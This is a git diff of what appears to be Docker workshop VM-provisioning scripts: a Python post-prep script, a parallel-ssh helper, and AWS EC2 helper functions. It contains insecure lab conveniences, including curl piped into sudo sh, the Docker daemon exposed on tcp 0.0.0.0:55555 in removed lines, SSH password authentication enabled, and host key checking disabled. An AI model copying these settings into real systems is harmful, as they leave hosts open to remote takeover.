||||
pdfkit.from_file(f, "ips.pdf", options={
|
||||
"page-size": SETTINGS["paper_size"],
|
||||
"margin-top": SETTINGS["paper_margin"],
|
||||
"margin-bottom": SETTINGS["paper_margin"],
|
||||
"margin-left": SETTINGS["paper_margin"],
|
||||
"margin-right": SETTINGS["paper_margin"],
|
||||
})
|
||||
print("Generated ips.pdf")
|
||||
except ImportError:
|
||||
print("WARNING: could not import pdfkit; did not generate ips.pdf")
|
||||
@@ -1,8 +1,3 @@
|
||||
pssh -I tee /tmp/settings.yaml < $SETTINGS
|
||||
|
||||
pssh sudo easy_install pyyaml
|
||||
|
||||
pssh -I tee /tmp/postprep.py <<EOF
|
||||
#!/usr/bin/env python
|
||||
import os
|
||||
import platform
|
||||
@@ -16,9 +11,10 @@ import yaml
|
||||
config = yaml.load(open("/tmp/settings.yaml"))
|
||||
COMPOSE_VERSION = config["compose_version"]
|
||||
MACHINE_VERSION = config["machine_version"]
|
||||
SWARM_VERSION = config["swarm_version"]
|
||||
CLUSTER_SIZE = config["clustersize"]
|
||||
CLUSTER_PREFIX = config["clusterprefix"]
|
||||
ENGINE_VERSION = config["engine_version"]
|
||||
DOCKER_USER_PASSWORD = config["docker_user_password"]
|
||||
|
||||
#################################
|
||||
|
||||
@@ -37,18 +33,21 @@ def system(cmd):
|
||||
t1 = time.time()
|
||||
f.write(bold("--- RUNNING [step {}] ---> {}...".format(STEP, cmd)))
|
||||
retcode = os.system(cmd)
|
||||
if retcode:
|
||||
retcode = bold(retcode)
|
||||
t2 = time.time()
|
||||
td = str(t2-t1)[:5]
|
||||
f.write("[{}] in {}s\n".format(retcode, td))
|
||||
f.write(bold("[{}] in {}s\n".format(retcode, td)))
|
||||
STEP += 1
|
||||
with open("/home/ubuntu/.bash_history", "a") as f:
|
||||
f.write("{}\n".format(cmd))
|
||||
if retcode != 0:
|
||||
msg = "The following command failed with exit code {}:\n".format(retcode)
|
||||
msg+= cmd
|
||||
raise(Exception(msg))
|
||||
|
||||
|
||||
# On EC2, the ephemeral disk might be mounted on /mnt.
|
||||
# If /mnt is a mountpoint, place Docker workspace on it.
|
||||
system("if mountpoint -q /mnt; then sudo mkdir /mnt/docker && sudo ln -s /mnt/docker /var/lib/docker; fi")
|
||||
system("if mountpoint -q /mnt; then sudo mkdir -p /mnt/docker && sudo ln -sfn /mnt/docker /var/lib/docker; fi")
|
||||
|
||||
# Put our public IP in /tmp/ipv4
|
||||
# ipv4_retrieval_endpoint = "http://169.254.169.254/latest/meta-data/public-ipv4"
|
||||
@@ -57,39 +56,13 @@ system("curl --silent {} > /tmp/ipv4".format(ipv4_retrieval_endpoint))
|
||||
|
||||
ipv4 = open("/tmp/ipv4").read()
|
||||
|
||||
# Add a "docker" user with password "training"
|
||||
system("sudo useradd -d /home/docker -m -s /bin/bash docker")
|
||||
system("echo docker:training | sudo chpasswd")
|
||||
|
||||
# Helper for Docker prompt.
|
||||
system("""sudo tee /usr/local/bin/docker-prompt <<SQRL
|
||||
#!/bin/sh
|
||||
case "\\\$DOCKER_HOST" in
|
||||
*:3376)
|
||||
echo swarm
|
||||
;;
|
||||
*:2376)
|
||||
echo \\\$DOCKER_MACHINE_NAME
|
||||
;;
|
||||
*:2375)
|
||||
echo \\\$DOCKER_MACHINE_NAME
|
||||
;;
|
||||
*:55555)
|
||||
echo \\\$DOCKER_MACHINE_NAME
|
||||
;;
|
||||
"")
|
||||
echo local
|
||||
;;
|
||||
*)
|
||||
echo unknown
|
||||
;;
|
||||
esac
|
||||
SQRL""")
|
||||
system("sudo chmod +x /usr/local/bin/docker-prompt")
|
||||
# Add a "docker" user with password coming from the settings
|
||||
system("id docker || sudo useradd -d /home/docker -m -s /bin/bash docker")
|
||||
system("echo docker:{} | sudo chpasswd".format(DOCKER_USER_PASSWORD))
|
||||
|
||||
# Fancy prompt courtesy of @soulshake.
|
||||
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
|
||||
export PS1='\e[1m\e[31m[\h] \e[32m(\\\$(docker-prompt)) \e[34m\u@{}\e[35m \w\e[0m\n$ '
|
||||
export PS1='\e[1m\e[31m[{}] \e[32m(\\$(docker-prompt)) \e[34m\u@\h\e[35m \w\e[0m\n$ '
|
||||
SQRL""".format(ipv4))
|
||||
|
||||
# Custom .vimrc
|
||||
@@ -111,51 +84,37 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e
|
||||
|
||||
system("sudo service ssh restart")
|
||||
system("sudo apt-get -q update")
|
||||
system("sudo apt-get -qy install git jq python-pip")
|
||||
|
||||
# increase the size of the conntrack table so we don't blow it up when going crazy with http load testing
|
||||
system("echo 1000000 | sudo tee /proc/sys/net/nf_conntrack_max")
|
||||
system("sudo apt-get -qy install git jq")
|
||||
|
||||
#######################
|
||||
### DOCKER INSTALLS ###
|
||||
#######################
|
||||
|
||||
# This will install the latest Docker.
|
||||
system("curl --silent https://{}/ | grep -v '( set -x; sleep 20 )' | sudo sh".format(ENGINE_VERSION))
|
||||
|
||||
# Make sure that the daemon listens on 55555 (for orchestration workshop).
|
||||
# To test, run: export DOCKER_HOST=tcp://localhost:55555 ; docker ps
|
||||
# or, run "curl localhost:55555" (it should return 404 not found). If it tells you connection refused, that's a bad sign
|
||||
system("sudo sed -i 's,-H fd://$,-H fd:// -H tcp://0.0.0.0:55555,' /lib/systemd/system/docker.service")
|
||||
system("sudo systemctl daemon-reload")
|
||||
|
||||
# There seems to be a bug in the systemd scripts; so work around it.
|
||||
# See https://github.com/docker/docker/issues/18444
|
||||
# If docker is already running, need to do a restart
|
||||
system("curl --silent localhost:55555 || sudo systemctl restart docker ") # does this work? if not, next line should cover it
|
||||
system("sudo systemctl start docker || true")
|
||||
#system("curl --silent https://{}/ | grep -v '( set -x; sleep 20 )' | sudo sh".format(ENGINE_VERSION))
|
||||
system("sudo apt-get -qy install apt-transport-https ca-certificates curl software-properties-common")
|
||||
system("curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -")
|
||||
system("sudo add-apt-repository 'deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial {}'".format(ENGINE_VERSION))
|
||||
system("sudo apt-get -q update")
|
||||
system("sudo apt-get -qy install docker-ce")
|
||||
|
||||
### Install docker-compose
|
||||
#system("sudo pip install -U docker-compose=={}".format(COMPOSE_VERSION))
|
||||
system("sudo curl -sSL -o /usr/local/bin/docker-compose https://github.com/docker/compose/releases/download/{}/docker-compose-{}-{}".format(COMPOSE_VERSION, platform.system(), platform.machine()))
|
||||
system("sudo chmod +x /usr/local/bin/docker-compose")
|
||||
system("docker-compose version")
|
||||
|
||||
### Install docker-machine
|
||||
system("sudo curl -sSL -o /usr/local/bin/docker-machine https://github.com/docker/machine/releases/download/v{}/docker-machine-{}-{}".format(MACHINE_VERSION, platform.system(), platform.machine()))
|
||||
system("sudo chmod +x /usr/local/bin/docker-machine")
|
||||
system("docker-machine version")
|
||||
|
||||
system("sudo apt-get remove -y --purge dnsmasq-base")
|
||||
system("sudo apt-get -qy install python-setuptools pssh apache2-utils httping htop unzip mosh")
|
||||
system("sudo apt-get -qy install python-setuptools pssh apache2-utils httping htop unzip mosh tree")
|
||||
|
||||
### Wait for Docker to be up.
|
||||
### (If we don't do this, Docker will not be responsive during the next step.)
|
||||
system("while ! sudo -u docker docker version ; do sleep 2; done")
|
||||
|
||||
### Install Swarm
|
||||
system("docker pull swarm:{}".format(SWARM_VERSION))
|
||||
system("docker tag -f swarm:{} swarm".format(SWARM_VERSION))
|
||||
|
||||
|
||||
### BEGIN CLUSTERING ###
|
||||
|
||||
addresses = list(l.strip() for l in sys.stdin)
|
||||
@@ -163,7 +122,7 @@ addresses = list(l.strip() for l in sys.stdin)
|
||||
assert ipv4 in addresses
|
||||
|
||||
def makenames(addrs):
|
||||
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
|
||||
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
|
||||
|
||||
while addresses:
|
||||
cluster = addresses[:CLUSTER_SIZE]
|
||||
@@ -177,33 +136,22 @@ while addresses:
|
||||
print(cluster)
|
||||
|
||||
mynode = cluster.index(ipv4) + 1
|
||||
system("echo 'node{}' | sudo -u docker tee /tmp/node".format(mynode))
|
||||
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
|
||||
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
|
||||
system("sudo -u docker mkdir -p /home/docker/.ssh")
|
||||
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
|
||||
|
||||
# Create a convenience file to easily check if we're the first node
|
||||
if ipv4 == cluster[0]:
|
||||
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
|
||||
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
|
||||
# On the first node, if we don't have a private key, generate one (with empty passphrase)
|
||||
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
|
||||
else:
|
||||
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
|
||||
# Record the IPV4 and name of the first node
|
||||
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
|
||||
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
|
||||
|
||||
FINISH = time.time()
|
||||
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
|
||||
system("echo {}".format(duration))
|
||||
|
||||
EOF
|
||||
|
||||
IPS_FILE=ips.txt
|
||||
if [ ! -s $IPS_FILE ]; then
|
||||
echo "ips.txt not found."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" < $IPS_FILE
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
|
||||
pssh "sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh | sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
pssh "grep docker@ /home/docker/.ssh/authorized_keys \
|
||||
|| cat /home/docker/.ssh/id_rsa.pub \
|
||||
| sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||
|
||||
28
prepare-vms/lib/pssh.sh
Normal file
28
prepare-vms/lib/pssh.sh
Normal file
@@ -0,0 +1,28 @@
|
||||
# This file can be sourced in order to directly run commands on
|
||||
# a group of VMs whose IPs are located in ips.txt of the directory in which
|
||||
# the command is run.
|
||||
|
||||
pssh() {
|
||||
if [ -z "$TAG" ]; then
|
||||
>/dev/stderr echo "Variable \$TAG is not set."
|
||||
return
|
||||
fi
|
||||
|
||||
HOSTFILE="tags/$TAG/ips.txt"
|
||||
|
||||
[ -f $HOSTFILE ] || {
|
||||
>/dev/stderr echo "Hostfile $HOSTFILE not found."
|
||||
return
|
||||
}
|
||||
|
||||
echo "[parallel-ssh] $@"
|
||||
export PSSH=$(which pssh || which parallel-ssh)
|
||||
|
||||
$PSSH -h $HOSTFILE -l ubuntu \
|
||||
--par 100 \
|
||||
-O LogLevel=ERROR \
|
||||
-O UserKnownHostsFile=/dev/null \
|
||||
-O StrictHostKeyChecking=no \
|
||||
-O ForwardAgent=yes \
|
||||
"$@"
|
||||
}
|
||||
4
prepare-vms/lib/wkhtmltopdf
Executable file
4
prepare-vms/lib/wkhtmltopdf
Executable file
@@ -0,0 +1,4 @@
|
||||
#!/bin/sh
|
||||
pidof Xvfb || Xvfb -terminate &
|
||||
export DISPLAY=:0
|
||||
exec wkhtmltopdf.real "$@"
|
||||
@@ -1,70 +0,0 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!-- Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
|
||||
width="466px" height="423.891px" viewBox="0 0 466 423.891" enable-background="new 0 0 466 423.891" xml:space="preserve">
|
||||
<rect x="-43.5" y="37.005" display="none" fill-rule="evenodd" clip-rule="evenodd" fill="#E7E7E7" width="792" height="612"/>
|
||||
<g>
|
||||
<path id="outline_7_" fill-rule="evenodd" clip-rule="evenodd" d="M242.133,168.481h47.146v48.194h23.837
|
||||
c11.008,0,22.33-1.962,32.755-5.494c5.123-1.736,10.872-4.154,15.926-7.193c-6.656-8.689-10.053-19.661-11.054-30.476
|
||||
c-1.358-14.71,1.609-33.855,11.564-45.368l4.956-5.732l5.905,4.747c14.867,11.946,27.372,28.638,29.577,47.665
|
||||
c17.901-5.266,38.921-4.02,54.701,5.088l6.475,3.734l-3.408,6.652c-13.345,26.046-41.246,34.113-68.524,32.687
|
||||
c-40.817,101.663-129.68,149.794-237.428,149.794c-55.666,0-106.738-20.81-135.821-70.197l-0.477-0.807l-4.238-8.621
|
||||
C4.195,271.415,0.93,247.6,3.145,223.803l0.664-7.127h40.315v-48.194h47.143v-47.145h94.292V74.191h56.574V168.481z"/>
|
||||
<g display="none">
|
||||
<path display="inline" fill="#394D54" d="M61.093,319.89c6.023,0,11.763-0.157,17.219-0.464c0.476-0.026,0.932-0.063,1.402-0.092
|
||||
c0.005-0.002,0.008-0.002,0.012-0.002c13.872-0.855,25.876-2.708,35.902-5.57c0.002-0.002,0.004-0.002,0.006-0.002
|
||||
c1.823-0.521,3.588-1.07,5.282-1.656c1.894-0.657,2.896-2.725,2.241-4.618c-0.656-1.895-2.722-2.899-4.618-2.24
|
||||
c-12.734,4.412-29.535,6.842-50.125,7.298c-0.002,0-0.004,0-0.005,0c-10.477,0.232-21.93-0.044-34.352-0.843c0,0,0,0-0.001,0
|
||||
c-0.635-0.038-1.259-0.075-1.9-0.118c-1.995-0.128-3.731,1.374-3.869,3.375c-0.136,1.999,1.376,3.73,3.375,3.866
|
||||
c2.537,0.173,5.03,0.321,7.49,0.453c0.392,0.021,0.77,0.034,1.158,0.054l0,0C47.566,319.697,54.504,319.89,61.093,319.89z"/>
|
||||
</g>
|
||||
<g id="Containers_8_">
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M86.209,179.744h3.227v34.052h-3.227V179.744z M80.02,179.744
|
||||
h3.354v34.052H80.02V179.744z M73.828,179.744h3.354v34.052h-3.354V179.744z M67.636,179.744h3.354v34.052h-3.354V179.744z
|
||||
M61.446,179.744H64.8v34.052h-3.354V179.744z M55.384,179.744h3.224v34.052h-3.224V179.744z M51.981,176.338h40.858v40.86H51.981
|
||||
V176.338z"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M133.354,132.598h3.229v34.051h-3.229V132.598z M127.165,132.598
|
||||
h3.354v34.051h-3.354V132.598z M120.973,132.598h3.354v34.051h-3.354V132.598z M114.781,132.598h3.354v34.051h-3.354V132.598z
|
||||
M108.593,132.598h3.352v34.051h-3.352V132.598z M102.531,132.598h3.222v34.051h-3.222V132.598z M99.124,129.193h40.863v40.859
|
||||
H99.124V129.193z"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M133.354,179.744h3.229v34.052h-3.229V179.744z M127.165,179.744
|
||||
h3.354v34.052h-3.354V179.744z M120.973,179.744h3.354v34.052h-3.354V179.744z M114.781,179.744h3.354v34.052h-3.354V179.744z
|
||||
M108.593,179.744h3.352v34.052h-3.352V179.744z M102.531,179.744h3.222v34.052h-3.222V179.744z M99.124,176.338h40.863v40.86
|
||||
H99.124V176.338z"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M180.501,179.744h3.225v34.052h-3.225V179.744z M174.31,179.744
|
||||
h3.355v34.052h-3.355V179.744z M168.12,179.744h3.354v34.052h-3.354V179.744z M161.928,179.744h3.354v34.052h-3.354V179.744z
|
||||
M155.736,179.744h3.354v34.052h-3.354V179.744z M149.676,179.744h3.222v34.052h-3.222V179.744z M146.271,176.338h40.861v40.86
|
||||
h-40.861V176.338z"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M180.501,132.598h3.225v34.051h-3.225V132.598z M174.31,132.598
|
||||
h3.355v34.051h-3.355V132.598z M168.12,132.598h3.354v34.051h-3.354V132.598z M161.928,132.598h3.354v34.051h-3.354V132.598z
|
||||
M155.736,132.598h3.354v34.051h-3.354V132.598z M149.676,132.598h3.222v34.051h-3.222V132.598z M146.271,129.193h40.861v40.859
|
||||
h-40.861V129.193z"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M227.647,179.744h3.226v34.052h-3.226V179.744z M221.457,179.744
|
||||
h3.354v34.052h-3.354V179.744z M215.265,179.744h3.354v34.052h-3.354V179.744z M209.073,179.744h3.354v34.052h-3.354V179.744z
|
||||
M202.884,179.744h3.354v34.052h-3.354V179.744z M196.821,179.744h3.224v34.052h-3.224V179.744z M193.416,176.338h40.861v40.86
|
||||
h-40.861V176.338z"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M227.647,132.598h3.226v34.051h-3.226V132.598z M221.457,132.598
|
||||
h3.354v34.051h-3.354V132.598z M215.265,132.598h3.354v34.051h-3.354V132.598z M209.073,132.598h3.354v34.051h-3.354V132.598z
|
||||
M202.884,132.598h3.354v34.051h-3.354V132.598z M196.821,132.598h3.224v34.051h-3.224V132.598z M193.416,129.193h40.861v40.859
|
||||
h-40.861V129.193z"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M227.647,85.451h3.226v34.053h-3.226V85.451z M221.457,85.451
|
||||
h3.354v34.053h-3.354V85.451z M215.265,85.451h3.354v34.053h-3.354V85.451z M209.073,85.451h3.354v34.053h-3.354V85.451z
|
||||
M202.884,85.451h3.354v34.053h-3.354V85.451z M196.821,85.451h3.224v34.053h-3.224V85.451z M193.416,82.048h40.861v40.86h-40.861
|
||||
V82.048z"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M274.792,179.744h3.224v34.052h-3.224V179.744z M268.602,179.744
|
||||
h3.352v34.052h-3.352V179.744z M262.408,179.744h3.354v34.052h-3.354V179.744z M256.218,179.744h3.354v34.052h-3.354V179.744z
|
||||
M250.026,179.744h3.354v34.052h-3.354V179.744z M243.964,179.744h3.227v34.052h-3.227V179.744z M240.561,176.338h40.86v40.86
|
||||
h-40.86V176.338z"/>
|
||||
</g>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" fill="#FFFFFF" d="M137.428,283.445c6.225,0,11.271,5.049,11.271,11.272
|
||||
c0,6.225-5.046,11.271-11.271,11.271c-6.226,0-11.272-5.046-11.272-11.271C126.156,288.494,131.202,283.445,137.428,283.445"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M137.428,286.644c1.031,0,2.015,0.194,2.923,0.546
|
||||
c-0.984,0.569-1.65,1.635-1.65,2.854c0,1.82,1.476,3.293,3.296,3.293c1.247,0,2.329-0.693,2.89-1.715
|
||||
c0.395,0.953,0.615,1.999,0.615,3.097c0,4.458-3.615,8.073-8.073,8.073c-4.458,0-8.074-3.615-8.074-8.073
|
||||
C129.354,290.258,132.971,286.644,137.428,286.644"/>
|
||||
<path fill="#FFFFFF" d="M167.394,364.677c-27.916-13.247-43.239-31.256-51.765-50.915c-10.37,2.961-22.835,4.852-37.317,5.664
|
||||
c-5.457,0.307-11.196,0.464-17.219,0.464c-6.942,0-14.26-0.205-21.94-0.613c25.6,25.585,57.094,45.283,115.408,45.645
|
||||
C158.866,364.921,163.14,364.837,167.394,364.677z"/>
|
||||
</g>
|
||||
</svg>
|
||||
|
Before Width: | Height: | Size: 6.5 KiB |
Binary file not shown.
|
Before Width: | Height: | Size: 65 KiB |
@@ -1,116 +0,0 @@
|
||||
#!/bin/bash
|
||||
|
||||
source scripts/cli.sh
|
||||
|
||||
aws_display_tags(){
|
||||
# Print all "Name" tags in our region with their instance count
|
||||
echo "[#] [Status] [Tag]" | awk '{ printf " %7s %8s %10s \n", $1, $2, $3}'
|
||||
aws ec2 describe-instances --filter "Name=tag:Name,Values=[*]" \
|
||||
--query "Reservations[*].Instances[*].[{Tags:Tags[0].Value,State:State.Name}]" \
|
||||
| awk '{ printf " %-13s %-10s %-1s\n", $1, $2, $3}' \
|
||||
| uniq -c \
|
||||
| sort -k 3
|
||||
}
|
||||
|
||||
aws_display_tokens(){
|
||||
# Print all tokens in our region with their instance count
|
||||
echo "[#] [Token] [Tag]" | awk '{ printf " %7s %12s %30s\n", $1, $2, $3}'
|
||||
# --query 'Volumes[*].{ID:VolumeId,AZ:AvailabilityZone,Size:Size}'
|
||||
aws ec2 describe-instances --output text \
|
||||
--query 'Reservations[*].Instances[*].{ClientToken:ClientToken,Tags:Tags[0].Value}' \
|
||||
| awk '{ printf " %7s %12s %50s\n", $1, $2, $3}' \
|
||||
| sort \
|
||||
| uniq -c \
|
||||
| sort -k 3
|
||||
}
|
||||
|
||||
aws_get_tokens() {
|
||||
aws ec2 describe-instances --output text \
|
||||
--query 'Reservations[*].Instances[*].[ClientToken]' \
|
||||
| sort -u
|
||||
}
|
||||
|
||||
aws_display_instance_statuses_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
|
||||
IDS=$(aws ec2 describe-instances \
|
||||
--filters "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ' )
|
||||
|
||||
aws ec2 describe-instance-status \
|
||||
--instance-ids $IDS \
|
||||
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
|
||||
--output table
|
||||
}
|
||||
|
||||
aws_display_instances_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
result=$(aws ec2 describe-instances --output table \
|
||||
--filter "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].[ \
|
||||
InstanceId, \
|
||||
State.Name, \
|
||||
Tags[0].Value, \
|
||||
PublicIpAddress, \
|
||||
InstanceType \
|
||||
]"
|
||||
)
|
||||
if [[ -z $result ]]; then
|
||||
echo "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
|
||||
else
|
||||
echo "ID State Tags IP Type" \
|
||||
| awk '{ printf "%9s %12s %15s %20s %14s \n", $1, $2, $3, $4, $5}' # column -t -c 70}
|
||||
echo "$result"
|
||||
fi
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_client_token() {
|
||||
TOKEN=$1
|
||||
need_tag $TOKEN
|
||||
aws ec2 describe-instances --filters "Name=client-token,Values=$TOKEN" \
|
||||
| grep ^INSTANCE \
|
||||
| awk '{print $8}'
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
aws ec2 describe-instances --filters "Name=tag:Name,Values=$TAG" \
|
||||
| grep ^INSTANCE \
|
||||
| awk '{print $8}'
|
||||
}
|
||||
|
||||
aws_get_instance_ips_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
|
||||
--output text \
|
||||
--query "Reservations[*].Instances[*].PublicIpAddress" \
|
||||
| tr "\t" "\n" \
|
||||
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
|
||||
}
|
||||
|
||||
aws_kill_instances_by_tag() {
|
||||
TAG=$1
|
||||
need_tag $TAG
|
||||
IDS=$(aws_get_instance_ids_by_tag $TAG)
|
||||
if [ -z "$IDS" ]; then
|
||||
die "Invalid tag."
|
||||
fi
|
||||
|
||||
echo "Deleting instances with tag $TAG"
|
||||
|
||||
aws ec2 terminate-instances --instance-ids $IDS \
|
||||
| grep ^TERMINATINGINSTANCES
|
||||
}
|
||||
|
||||
aws_tag_instances() {
|
||||
OLD_TAG_OR_TOKEN=$1
|
||||
NEW_TAG=$2
|
||||
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user